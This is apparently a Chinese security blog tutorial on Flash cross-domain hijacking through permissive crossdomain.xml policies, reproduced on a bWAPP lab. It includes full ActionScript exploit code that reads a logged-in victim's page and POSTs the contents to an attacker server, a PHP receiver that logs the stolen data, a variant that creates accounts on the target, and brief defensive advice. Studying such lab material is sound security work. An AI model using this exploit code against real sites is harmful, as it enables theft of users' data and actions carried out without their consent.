初识flash跨域劫持漏洞

2021-09-29 本文已影响0人 book4yi

基础知识：

Flash（交互式矢量图和Web动画标准）是一种动画创作与应用程序开发于一身的创作软件。Adobe Flash Professional CC为创建数字动画、交互式Web站点、桌面应用程序以及手机应用程序开发提供了功能全面的创作和编辑环境。Flash广泛用于创建吸引人的应用程序，它们包含丰富的视频、声音、图形和动画。可以在Flash中创建原始内容或者从其它Adobe应用程序（如Photoshop或illustrator）导入它们，快速设计简单的动画，以及使用Adobe ActionScript 3.0开发高级的交互式项目。设计人员和开发人员可使用它来创建演示文稿、应用程序和其它允许用户交互的内容。Flash可以包含简单的动画、视频内容、复杂演示文稿和应用。

ActionScript（简称AS）是由Macromedia（现已被Adobe收购）为其Flash产品开发的，最初是一种简单的脚本语言，现在最新版本ActionScript3.0，是一种完全的面向对象的编程语言，功能强大，类库丰富，语法类似JavaScript，多用于Flash互动性、娱乐性、实用性开发，网页制作和RIA（丰富互联网程序）开发。

目前，网上大多数Flash都是应用ActionScript2或ActionScript3来编写的。

编写个弹框的swf文件，编写test.as文件如下：
(Flash中可以使用ExternalInterface.call来执行JavaScript代码)

package
{
    import flash.display.Sprite;
    import flash.external.ExternalInterface;
       
    public class test extends Sprite
    {
        public function test()
        {
            ExternalInterface.call('alert(document.URL)');
        }
    }
}

利用mxmlc编译生成test.swf，并将它放置在web目录下进行访问：

Flash 调用与跨域：

Flash的调用和请求情形分别如下：

HTML调用Flash时，Flash可以改后缀名；

Flash可以单独访问，但是其效果类似于HTML调用同域的Flash，但是后缀必须是swf；

Flash发动请求时，是根据Flash的域来判断的，而不是HTML来判断：
（1）Flash请求同域资源时，直接忽视crossdomain.xml；
（2）Flash请求外域资源时，受外域下crossdomain.xml里的策略限制；

自flash 10以后，如有跨域访问需求，必须在目标域的根目录下放置crossdomain.xml文件，且该根目录下的配置文件称为“主策略文件”。若不存在主策略文件，则该域将禁止任何第三方域的flash跨域请求。主策略文件对全站的跨域访问起控制作用，指明了远程 Flash 是否可以加载当前网站的资源（图片、网页内容、Flash等），也可以单独在某路径下放置仅对该路径及其子路径生效的crossdomain.xml配置文件，这需要在flash的AS脚本中使用如下语句来加载该配置文件：

Security.loadPolicyFile(“xxx.com/subdir/crossdomain.xml”)

flash在跨域时唯一的限制策略就是crossdomain.xml文件，该文件限制了flash是否可以跨域读写数据以及允许从什么地方跨域读写数据。位于.a.com域中的SWF文件要访问b.com的文件时，SWF首先会检查b.com服务器目录下是否有crossdomain.xml文件，如果没有，则访问不成功；若crossdomain.xml文件存在，且里边设置了允许a.com域访问，那么通信正常。所以要使Flash可以跨域传输数据，其关键就是crossdomain.xml。

HTML跨域加载Flash时的授权：

在HTML页面嵌入Flash时，其中的Object和Embed标签都有allowScriptAccess参数和allowNetworking参数，主要是用于在HTML页面调用执行Flash文件的场景。

allowScriptAccess：控制html页面与Flash页面的通讯。

always：html和Flash页面的通讯不做任何的限制；
samedomain：html和Flash同域的时候可以做通讯【这个值是默认值】；
never：html和Flash禁止通讯。

allowNetworking：控制Flash与外部的网络通讯。

all：Flash所有的网络API通讯接口都可用；
internal：navigateToURL，fscommand，ExternalInterface.call不可用；
none：所有的网络API不可用。

crossdomain.xml：

cross-domain-policycross-domain-policy元素是跨域策略文件crossdomain.xml的根元素。它只是一个策略定义的容器，没有自己的属性。子元素有：

site-control（确认是否可以允许加载其他策略文件）

allow-access-from（确认能够读取本域内容的flash文件来源域）

allow-access-from-identity（有特定证书的来源跨域访问本域上的资源）

allow-http-request-headers-from（授权第三方域flash向本域发送用户定义的http头）

常用的节点为allow-access-from，用来指明允许本域资源允许被哪些域名的Flash跨域请求。

漏洞利用：

这里我们利用bwapp靶场进行漏洞复现：
项目地址：https://github.com/nccgroup/CrossSiteContentHijacking
将源代码下载下来部署到本地，类型选择Flash。
浏览器需要支持Flash播放，这里利用Flash中心客户端自带的浏览器进行复现

输入Target Page后，点击Retrieve Contents，在下方可以看到成功读取到个人信息的secret内容。

通过抓包可以看到，首先会检查目标服务器根目录下是否有crossdomain.xml文件，确定允许当前域访问后，利用用户的登录凭证跨域传输数据：

真正的利用情境需要重新构造特定的恶意页面。就像CSRF需要构造一个页面诱导用户点击一样，Flash跨域也需要构造类似的情景。传统的CSRF是写入型的攻击，一般都是通过表单提交数据包，浏览器自动携带cookie，因为js是无法跨域的，这也是为什么CSRF只能进行写入操作。Flash跨域类似，也需要用户的登陆凭证才能访问敏感页面，其中的不同点在于Flash脚本可以操作cookie发送表单，进而可以执行读取操作。

项目地址：https://github.com/OpenSecurityResearch/flash-xdomain-xploit
实现目标：当登录用户访问恶意服务器，利用Flash跨域获取用户的敏感信息并写入txt文件中
测试环境：192.168.151.110（恶意服务器）+ 192.168.107.156（目标服务器）+ BWAPP（web应用系统）

编辑XDomainXploit.as文件，对于简单的get请求如下，只需要修改自己的victim URL和attacker URL

// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// XDomainXploit.as
// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "http://192.168.107.156/bwapp/secret.php";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://192.168.151.110/get_flash_data.php"
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}

使用mxmlc编译actionscript（注意要用32位的JDK)：

mxmlc.exe XDomainXploit.as

将xdx.html和编译生成的XDomainXploit.swf放置到本地web目录
创建用来接受敏感信息的文件：

<?php
$data = file_get_contents("php://input");
$ret = file_put_contents('E:/phpstudy_pro/WWW/receive_flash_data.txt', 
$data, FILE_APPEND | LOCK_EX);
if($ret === false) { 
    die('Error writing to file');
}else { 
 echo "$ret bytes written to file";
}
?>

欺骗登录用户访问恶意网站：

成功获取用户的敏感信息并写入txt文件中：

除了获取敏感信息，还可以在目标站点上执行一些敏感操作，比如修改密码等：

post型：

// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// XDomainXploit.as
// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLRequestHeader;

    public class XDomainXploit_Post extends Sprite {
        public function XDomainXploit_Post() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "http://192.168.107.169/bwapp/user_extra.php";
            var header:URLRequestHeader = new URLRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.method = URLRequestMethod.POST;
            readRequest.data = "login=book4yi&email=test@test.com&password=asd12345&password_conf=asd12345&secret=99612345&action=create";
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://192.168.151.109/get_flash_data.php"
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}

尝试在bwapp创建一个新用户：

成功创建并登录成功：

防御方法：

当站点不需要跨域请求资源时，尽量删除crossdomain.xml文件；

若需crossdomain.xml文件，则必须严格设置allow-access-from标签中domain的白名单

补充:

参考如下：

跨站数据劫持
 前端跨域安全 - FreeBuf网络安全行业门户
 crossdomain.xml文件配置不当利用手法
 Flash型XSS总结 [ Mi1k7ea ]
Flash型CSRF总结 [ Mi1k7ea ]